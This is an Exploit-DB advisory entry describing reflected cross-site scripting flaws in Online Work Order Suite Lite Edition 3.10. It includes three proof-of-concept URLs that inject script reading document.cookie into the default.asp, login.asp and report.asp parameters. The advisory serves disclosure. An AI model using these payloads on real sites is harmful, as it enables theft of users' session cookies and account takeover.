Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

34492

CVE:

N/A


Author:

Moudi

Type:

webapps


Platform:

ASP

Date:

2009-08-10


source: https://www.securityfocus.com/bid/42535/info

Online Work Order Suite Lite Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Online Work Order Suite Lite Edition 3.10 is vulnerable; other versions may also be affected. 

http://www.example.com/demo/owoslite/default.asp?show="><script>alert(document.cookie);</script>
http://www.example.com/demo/owoslite/login.asp?go="><script>alert(document.cookie);</script>
http://www.example.com/demo/owoslite/report.asp?show="><script>alert(document.cookie);</script>